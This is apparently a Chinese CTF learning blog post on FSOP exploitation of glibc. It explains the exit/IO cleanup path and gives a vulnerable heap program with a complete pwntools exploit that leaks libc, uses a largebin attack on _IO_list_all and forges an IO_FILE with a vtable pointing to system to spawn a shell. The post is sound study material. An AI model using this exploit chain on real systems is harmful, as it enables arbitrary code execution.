【我的 PWN 学习手札】IO_FILE 之 FSOP

FSOP:File Stream Oriented Programming

通过劫持 _IO_list_all 指向伪造的 _IO_FILE_plus,进而调用fake IO_FILE 结构体对象中被伪造的vtable指向的恶意函数。

目录

前言

一、glibc-exit函数浅析

二、FSOP

三、Largebin attack + FSOP

(一)Leak libc

(二)Largebin attack

(三)FSOP 

(四)调试追踪调用

(五)EXP


前言

我们将着重关注vtable中的_IO_file_overflow函数指针。

当函数exit时,程序执行_IO_flush_all_lockp 函数。该函数会刷新 _IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用fflush ,也对应着会调用 _IO_FILE_plus.vtable 中的_IO_overflow。

参考宝藏博主:linux IO_FILE 利用_io list all结构体-CSDN博客 


一、glibc-exit函数浅析

一般FSOP可以通过exit来触发布置好的fake IO,我们来粗略过一遍流程

// exit.c
void exit(int status)
{__run_exit_handlers(status, &__exit_funcs, true);
}
libc_hidden_def(exit)/* Call all functions registered with `atexit' and `on_exit',in the reverse of the order in which they were registeredperform stdio cleanup, and terminate program execution with STATUS.  */
voidattribute_hidden__run_exit_handlers(int status, struct exit_function_list **listp,bool run_list_atexit)
{/* First, call the TLS destructors.  */
#ifndef SHAREDif (&__call_tls_dtors != NULL)
#endif__call_tls_dtors();/* We do it this way to handle recursive calls to exit () made bythe functions registered with `atexit' and `on_exit'. We calleveryone on the list and use the status value in the lastexit (). */while (*listp != NULL){struct exit_function_list *cur = *listp;while (cur->idx > 0){const struct exit_function *const f =&cur->fns[--cur->idx];switch (f->flavor){void (*atfct)(void);void (*onfct)(int status, void *arg);void (*cxafct)(void *arg, int status);case ef_free:case ef_us:break;case ef_on:onfct = f->func.on.fn;
#ifdef PTR_DEMANGLEPTR_DEMANGLE(onfct);
#endifonfct(status, f->func.on.arg);break;case ef_at:atfct = f->func.at;
#ifdef PTR_DEMANGLEPTR_DEMANGLE(atfct);
#endifatfct();break;case ef_cxa:cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLEPTR_DEMANGLE(cxafct);
#endifcxafct(f->func.cxa.arg, status);break;}}*listp = cur->next;if (*listp != NULL)/* Don't free the last element in the chain, this is the staticallyallocate element.  */free(cur);}if (run_list_atexit)RUN_HOOK(__libc_atexit, ());_exit(status);
}

exit实际调用了__run_exit_handlers函数。它的作用是在程序退出时调用所有通过 atexit 和 on_exit 注册的函数,并执行标准 I/O 清理,最终终止程序执行。

对于函数参数中的&__exit_funcs,可以继续追踪定位到其实现:

// cxa_atexit.c/* Register a function to be called by exit or when a shared libraryis unloaded.  This function is only called from code generated bythe C++ compiler.  */
int __cxa_atexit(void (*func)(void *), void *arg, void *d)
{return __internal_atexit(func, arg, d, &__exit_funcs);
}
libc_hidden_def(__cxa_atexit)/* We change global data, so we need locking.  */__libc_lock_define_initialized(static, lock)static struct exit_function_list initial;
struct exit_function_list *__exit_funcs = &initial;

对于“执行标准 I/O 清理”操作我们更为关心,chat得知是下述函数实现:

  if (run_list_atexit)RUN_HOOK(__libc_atexit, ());

 经过全局搜索可追溯到:

// genops.c
#ifdef text_set_element
text_set_element(__libc_atexit, _IO_cleanup);
#endif

此处已经看到,执行了IO清理的操作,继续追溯:

int
_IO_cleanup (void)
{/* We do *not* want locking.  Some threads might use streams butthat is their problem, we flush them underneath them.  */int result = _IO_flush_all_lockp (0);/* We currently don't have a reliable mechanism for making sure thatC++ static destructors are executed in the correct order.So it is possible that other static destructors might want towrite to cout - and they're supposed to be able to do so.The following will make the standard streambufs be unbuffered,which forces any output from late destructors to be written out. */_IO_unbuffer_all ();return result;
}int
_IO_flush_all_lockp (int do_lock)
{int result = 0;struct _IO_FILE *fp;int last_stamp;#ifdef _IO_MTSAFE_IO__libc_cleanup_region_start (do_lock, flush_cleanup, NULL);if (do_lock)_IO_lock_lock (list_all_lock);
#endiflast_stamp = _IO_list_all_stamp;fp = (_IO_FILE *) _IO_list_all;while (fp != NULL){run_fp = fp;if (do_lock)_IO_flockfile (fp);if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T|| (_IO_vtable_offset (fp) == 0&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr> fp->_wide_data->_IO_write_base))
#endif)&& _IO_OVERFLOW (fp, EOF) == EOF)result = EOF;if (do_lock)_IO_funlockfile (fp);run_fp = NULL;if (last_stamp != _IO_list_all_stamp){/* Something was added to the list.  Start all over again.  */fp = (_IO_FILE *) _IO_list_all;last_stamp = _IO_list_all_stamp;}elsefp = fp->_chain;}#ifdef _IO_MTSAFE_IOif (do_lock)_IO_lock_unlock (list_all_lock);__libc_cleanup_region_end (0);
#endifreturn result;
}

至此看到,对于_IO_list_all上的IO_FILE链,都执行_IO_OVERFLOW的操作。 

二、FSOP

劫持 _IO_list_all 的方式一般有两种:

  1. 修改 IO_FILE 结构体,为了不影响 IO 建议修改 _IO_2_1_stderr 结构体。
  2. 利用例如 large bin attack 的攻击方法将 _IO_list_all 覆盖成一个 chunk 地址,然后在该 chunk 上伪造 IO_FILE 结构体。 

        在劫持 _IO_2_1_stderr 时除了修改 vtable 指针指向伪造 vtable 外,要想调用 _IO_2_1_stderr 还需要修改 以满足以下条件:

fp->_mode _IO_write_ptr > fp->_IO_write_base

        因此不妨将 vtable 伪造在 _IO_2_1_stderr + 0x10 处使 _IO_overflow , _IO_2_1_stderr 的 fp->_IO_write_ptr 恰好对应于 vtable 的 _IO_overflow 。然后将fp->_IO_write_ptr 写入 system 函数地址。由于_IO_overflow 传入的参数为_IO_2_1_stderr 结构体,因此将结构体其实位置处写入 /bin/sh 字符串。 

                                                                                                                  ——by _sky123_

这里通过模板题,利用largebin attack来实现FSOP 

三、Largebin attack + FSOP

#include<stdlib.h>
#include <stdio.h>
#include <unistd.h>char *chunk_list[0x100];void menu() {puts("1. add chunk");puts("2. delete chunk");puts("3. edit chunk");puts("4. show chunk");puts("5. exit");puts("choice:");
}int get_num() {char buf[0x10];read(0, buf, sizeof(buf));return atoi(buf);
}void add_chunk() {puts("index:");int index = get_num();puts("size:");int size = get_num();chunk_list[index] = malloc(size);
}void delete_chunk() {puts("index:");int index = get_num();free(chunk_list[index]);
}void edit_chunk() {puts("index:");int index = get_num();puts("length:");int length = get_num();puts("content:");read(0, chunk_list[index], length);
}void show_chunk() {puts("index:");int index = get_num();puts(chunk_list[index]);
}int main() {setbuf(stdin, NULL);setbuf(stdout, NULL);setbuf(stderr, NULL);while (1) {menu();switch (get_num()) {case 1:add_chunk();break;case 2:delete_chunk();break;case 3:edit_chunk();break;case 4:show_chunk();break;case 5:exit(0);default:puts("invalid choice.");}}
}

(一)Leak libc

同时为了准备largebin attack,申请largebin范围大小的chunk

# leak libc
add(0,0x10)
add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x10)
delete(0)
delete(2)

show(0)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x39bb78
success(hex(libc.address))
show(2)
io.recvline()
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success(hex(heap_base))

(二)Largebin attack

# Largebin attack
add(0,0x418)
add(10,0x500)   
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))     
delete(0)
add(10,0x500)

确实写了一个堆地址,但是为了能够布置数据,我们希望能将堆申请出来。为此我们不通过申请大chunk来触发largebin attack,而是申请一个小chunk,释放unsortedbin chunk到largebin中触发,又从largebin中取出chunk,到unsortedbin。至此largebin里只剩下目标chunk,我们再恢复一下相关指针,就可以将该chunk malloc出来。

修改上述exp片段代码

# Largebin attack
add(0,0x418)
add(10,0x500)
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))
delete(0)
add(10,0x10)

可以看到unsortedbin里有一个chunk,largebin生下了目标chunk,接下来恢复指针

# fd、bk指向libc,fd_nextsize、bk_nextsize指向自己
edit(2,p64(libc.address+0x39bf68)*2+p64(heap_base+0x460)*2)

接下来申请出目标chunk

add(0,0x428)

(三)FSOP 

可见我们可控的区域实际上偏移了0x10,为此我们可以通过物理临近的前一个chunk复用prev_size字段来修改。

IO_FILE有模板,这里给出(来自这个大佬的博客) 

fake_file = b""
fake_file += b"/bin/sh\x00"  # _flags, an magic number
fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8, b'\x00')  # adjust to vtable
fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable

由于缺了0x10可控,这里需要薛微调整一下:

fake_file = b""
# fake_file += b"/bin/sh\x00"  # _flags, an magic number
# fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8-0x10, b'\x00')  # adjust to vtable
# fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable
fake_file += p64(heap_base+0x460 + 0x10)  # fake vtable
edit(0,fake_file)

然后就:

pwndbg> p *_IO_list_all
$4 = {file = {_flags = 0,_IO_read_ptr = 0x431 <error: Cannot access memory at address 0x431>,_IO_read_end = 0x0,_IO_read_base = 0x0,_IO_write_base = 0x0,_IO_write_ptr = 0x72d08ec3f560 <__libc_system> "H\205\377t\v\351\206\372\377\377f\017\037D",_IO_write_end = 0x0,_IO_buf_base = 0x0,_IO_buf_end = 0x0,_IO_save_base = 0x0,_IO_backup_base = 0x0,_IO_save_end = 0x0,_markers = 0x0,_chain = 0x72d08ef9c620 <_IO_2_1_stdout_>,_fileno = 2,_flags2 = 0,_old_offset = -1,_cur_column = 0,_vtable_offset = 0 '\000',_shortbuf = "\n",_lock = 0x72d08ef9e4c0 <prof_info+160>,_offset = -1,_codecvt = 0x0,_wide_data = 0x72d08ef9c4c0 <_nl_global_locale+160>,_freeres_list = 0x0,_freeres_buf = 0x0,__pad5 = 0,_mode = -1,_unused2 = '\000' <repeats 19 times>},vtable = 0x5e7f135df470
}
pwndbg> p *_IO_list_all.vtable 
$5 = {__dummy = 0,__dummy2 = 0,__finish = 0x0,__overflow = 0x72d08ec3f560 <__libc_system>,__underflow = 0x0,__uflow = 0x0,__pbackfail = 0x0,__xsputn = 0x0,__xsgetn = 0x0,__seekoff = 0x0,__seekpos = 0x0,__setbuf = 0x72d08ef9c620 <_IO_2_1_stdout_>,__sync = 0x2,__doallocate = 0xffffffffffffffff,__read = 0xa000000,__write = 0x72d08ef9e4c0 <prof_info+160>,__seek = 0xffffffffffffffff,__close = 0x0,__stat = 0x72d08ef9c4c0 <_nl_global_locale+160>,__showmanyc = 0x0,__imbue = 0x0
}

然后我们通过chunk_list[1]来布置"/bin/sh\x00"

edit(1,p64(0)*2+b'/bin/sh\x00')

(四)调试追踪调用

exit -> __run_exit_handlers -> _IO_cleanup -> _IO_flush_all_lockp -> fileop.vtable.overflow

fileop已经被我们劫持,也在该结构体头布置了”/bin/sh\x00"参数,因此执行system("/bin/sh\x00")

(五)EXP 

from pwn import *elf=ELF("./pwn")
libc=ELF("./libc.so.6")
context.arch=elf.arch
context.log_level='debug'
context.os=elf.os
def add(index, size):io.sendafter(b"choice:", b"1")io.sendafter(b"index:", str(index).encode())io.sendafter(b"size:", str(size).encode())def delete(index):io.sendafter(b"choice:", b"2")io.sendafter(b"index:", str(index).encode())def edit(index, content):io.sendafter(b"choice:", b"3")io.sendafter(b"index:", str(index).encode())io.sendafter(b"length:", str(len(content)).encode())io.sendafter(b"content:", content)def show(index):io.sendafter(b"choice:", b"4")io.sendafter(b"index:", str(index).encode())io=process("./pwn")# leak libc
add(0,0x10)
add(0,0x418)
add(1,0x18)
add(2,0x428)
add(3,0x10)
delete(0)
delete(2)show(0)
io.recvline()
libc.address=u64(io.recv(6).ljust(8,b'\x00'))-0x39bb78
success(hex(libc.address))
show(2)
io.recvline()
heap_base=u64(io.recv(6).ljust(8,b'\x00')) & ~0xfff
success(hex(heap_base))# Largebin attack
add(0,0x418)
add(10,0x500)
edit(2,p64(0)*3+p64(libc.sym['_IO_list_all']-0x20))  # 0x39bf68
delete(0)
add(10,0x10)
edit(2,p64(libc.address+0x39bf68)*2+p64(heap_base+0x460)*2)
add(0,0x428)fake_file = b""
# fake_file += b"/bin/sh\x00"  # _flags, an magic number
# fake_file += p64(0)  # _IO_read_ptr
fake_file += p64(0)  # _IO_read_end
fake_file += p64(0)  # _IO_read_base
fake_file += p64(0)  # _IO_write_base
fake_file += p64(libc.sym['system'])  # _IO_write_ptr
fake_file += p64(0)  # _IO_write_end
fake_file += p64(0)  # _IO_buf_base;
fake_file += p64(0)  # _IO_buf_end should usually be (_IO_buf_base + 1)
fake_file += p64(0) * 4  # from _IO_save_base to _markers
fake_file += p64(libc.sym['_IO_2_1_stdout_'])  # the FILE chain ptr
fake_file += p32(2)  # _fileno for stderr is 2
fake_file += p32(0)  # _flags2, usually 0
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _old_offset, -1
fake_file += p16(0)  # _cur_column
fake_file += b"\x00"  # _vtable_offset
fake_file += b"\n"  # _shortbuf[1]
fake_file += p32(0)  # padding
fake_file += p64(libc.sym['_IO_2_1_stdout_'] + 0x1ea0)  # _IO_stdfile_1_lock
fake_file += p64(0xFFFFFFFFFFFFFFFF)  # _offset, -1
fake_file += p64(0)  # _codecvt, usually 0
fake_file += p64(libc.sym['_IO_2_1_stdout_'] - 0x160)  # _IO_wide_data_1
fake_file += p64(0) * 3  # from _freeres_list to __pad5
fake_file += p32(0xFFFFFFFF)  # _mode, usually -1
fake_file += b"\x00" * 19  # _unused2
fake_file = fake_file.ljust(0xD8-0x10, b'\x00')  # adjust to vtable
# fake_file += p64(libc.sym['_IO_2_1_stderr_'] + 0x10)  # fake vtable
fake_file += p64(heap_base+0x460 + 0x10)  # fake vtable
edit(0,fake_file)
edit(1,p64(0)*2+b'/bin/sh\x00')gdb.attach(io,'b exit\nc')io.interactive()

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/65251.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

DDcGAN_多分辨率图像融合的双鉴别条件生成对抗网络_y译文马佳义

摘要&#xff1a; 在本文中&#xff0c;我们提出了一种新的端到端模型&#xff0c;称为双鉴别条件生成对抗网络&#xff08;DDcGAN&#xff09;&#xff0c;用于融合不同分辨率的红外和可见光图像。我们的方法建立了一个生成器和两个鉴别器之间的对抗博弈。生成器的目的是基于特…

springboot配置线程池

直接上代码 配置 定义一个配置类 创建一个springboot能扫描到的地方创建一个线程池配置类 配置信息 package com.example.demonew.config;import org.springframework.context.annotation.Bean; import org.springframework.context.annotation.Configuration; import or…

【君正T31开发记录】12.编译工具相关总结及介绍

移植交叉工具包的时候&#xff0c;发现这是很多工具的集合包&#xff1b;以及写makefile的时候&#xff0c;也需要了解下这些工具的作用及用法&#xff0c;这里总结记录一下常见的工具及相关用法。 g C编译器&#xff0c;用于编译C源代码文件&#xff0c;这个很常见&#xff0…

List-顺序表--2

目录 1、ArrayList 2、ArrayList构造方法 3、ArrayList常见方法 4、ArrayList的遍历 5、ArrayList的扩容机制 6、ArrayList的具体使用 6.1、杨辉三角 6.2、简单的洗牌算法 1、ArrayList 在集合框架中&#xff0c;ArrayList 是一个普通的类&#xff0c;实现了 List 接口…

lambda用法及其原理

目录 lambda形式lambda用法1.sort降序2.swap3.捕捉列表 习题解题 lambda形式 [capture-list](parameters)->return type{function boby}[capture-list]&#xff1a;[捕捉列表]用于捕捉函数外的参数&#xff0c;可以为空&#xff0c;但不能省略&#xff1b;(parameters) &am…

基于ASP.NET的动漫网站

一、系统架构与技术实现 系统架构&#xff1a;基于ASP.NET的MVC框架构建&#xff0c;实现网站的层次结构&#xff0c;使得网站更加易于维护和扩展。 技术实现&#xff1a;利用ASP.NET的技术特点&#xff0c;如强大的后端开发能力、丰富的UI控件等&#xff0c;结合前端技术如HT…

Visual studio code编写简单记事本exe笔记

安装扩展cmake tools c/c c/c Extension pack CMakeLists.txt cmake_minimum_required(VERSION 3.20) project(NotepadApp)set(CMAKE_CXX_STANDARD 17) set(CMAKE_CXX_STANDARD_REQUIRED ON)# Windows specific settings if(WIN32)set(CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS ON)s…

Linux 35.6 + JetPack v5.1.4之编译 pytorch升级

Linux 35.6 JetPack v5.1.4之编译 pytorch升级 1. 源由2. 升级步骤1&#xff1a;获取二进制版本步骤2&#xff1a;安装二进制版本步骤3&#xff1a;获取torchvision步骤4&#xff1a;安装torchvision步骤5&#xff1a;检查安装版本 3. 使用4. 补充4.1 torchvision版本问题4.2 …

计算机网络--根据IP地址和路由表计算下一跳

一、必备知识 1.无分类地址IPV4地址网络前缀主机号 2.每个IPV4地址由32位二进制数组成 3. /15这个地址表示网络前缀有15位&#xff0c;那么主机号32-1517位。 4.地址掩码&#xff08;子网掩码&#xff09;&#xff1a;所对应的网络前缀为1&#xff0c;主机号为0。 5.计算下…

插入式微型机顶盒来了

快科技1月6日消息&#xff0c;据国家广播电视总局今日消息&#xff0c;国家广播电视总局为首款以插入式微型机顶盒品类通过入网检测的设备颁发了入网认定证书。 这是插入式微型机顶盒批量部署进程中的又一大进展。同时&#xff0c;广播电视科学研究院依据行业标准建成了插入式…

XXL-RPC v1.8.1 | RPC服务框架

Release Notes 1、【安全】序列化安全性增强&#xff0c;默认开启package安全空间机制&#xff1b;2、【扩展】序列化扩展性增强&#xff0c;支持自定义序列化package白名单&#xff1b;3、【优化】序列化类型主动检测&#xff0c;提升问题定位效率&#xff1b;4、【能力】服务…

前端路由layout布局处理以及菜单交互(三)

上篇介绍了前端项目部署以及基本依赖的应用&#xff0c;这次主要对于路由以及布局进行模块化处理 一、 创建layout模块 1、新建src/layout/index.vue <template><el-container class"common-layout"><!-- <el-aside class"aside">&l…

Spring Boot(4)使用 IDEA 搭建 Spring Boot+MyBatis 项目全流程实战

文章目录 一、⚡搞个引言二、⚡开始搭建 Spring Boot 项目吧&#xff01;2.1 启动 IDEA 并创建新项目2.2 选择项目依赖2.3 完成项目创建 三、&#x1f4d8;项目结构剖析四、✍配置数据库连接五、✍ 创建 MyBatis 相关组件5.1 实体类&#xff08;Entity&#xff09;5.2 Mapper 接…

【数据可视化-11】全国大学数据可视化分析

&#x1f9d1; 博主简介&#xff1a;曾任某智慧城市类企业算法总监&#xff0c;目前在美国市场的物流公司从事高级算法工程师一职&#xff0c;深耕人工智能领域&#xff0c;精通python数据挖掘、可视化、机器学习等&#xff0c;发表过AI相关的专利并多次在AI类比赛中获奖。CSDN…

141.《mac m1安装mongodb详细教程》

文章目录 下载从官网下载安装包 下载后双击解压出文件夹安装文件名修改为 mongodb配置data存放位置和日志log的存放位置启动方式一方式二方式二:输入mongo报错以及解决办法 本人电脑 m2 pro,属于 arm 架构 下载 官网地址: mongodb官网 怎么查看自己电脑应该下载哪个版本,输入…

frameworks 之 Winscope 工具

frameworks 之 Winscope 工具 1. 手机端开启2. 加载追踪的文件2.1 Android12 3. 分析文件 Winscope 是一款 Web 工具&#xff0c;可以让用户在动画和转换期间和之后记录、重放和分析多个系统服务的状态。Winscope 将所有相关的系统服务状态记录在一个跟踪文件中。使用带有跟踪文…

【姿态估计实战】使用OpenCV和Mediapipe构建锻炼跟踪器【附完整源码与详细说明】

《------往期经典推荐------》 一、AI应用软件开发实战专栏【链接】 项目名称项目名称1.【人脸识别与管理系统开发】2.【车牌识别与自动收费管理系统开发】3.【手势识别系统开发】4.【人脸面部活体检测系统开发】5.【图片风格快速迁移软件开发】6.【人脸表表情识别系统】7.【…

cityhash–对字符串的哈希算法

原文地址&#xff1a;cityhash–对字符串的哈希算法 – 无敌牛 欢迎参观我的个人博客&#xff1a;无敌牛 – 技术/著作/典籍/分享等 分享一个给字符串计算hash的开源库&#xff0c;谷歌出品。 源代码在&#xff1a;https://github.com/google/cityhash 可以自己下载&#x…

spring cloud微服务分布式架构

spring cloud微服务分布式架构 应用架构 单体应用架构&#xff1a;all in one 如&#xff1a;前端后端部署在一台服务器中 web应用和数据库放在同一台服务器中&#xff0c;只要服务器挂掉&#xff0c;应用就会终止。 分布式架构&#xff1a;将一个系统拆分为多个独立的组件&…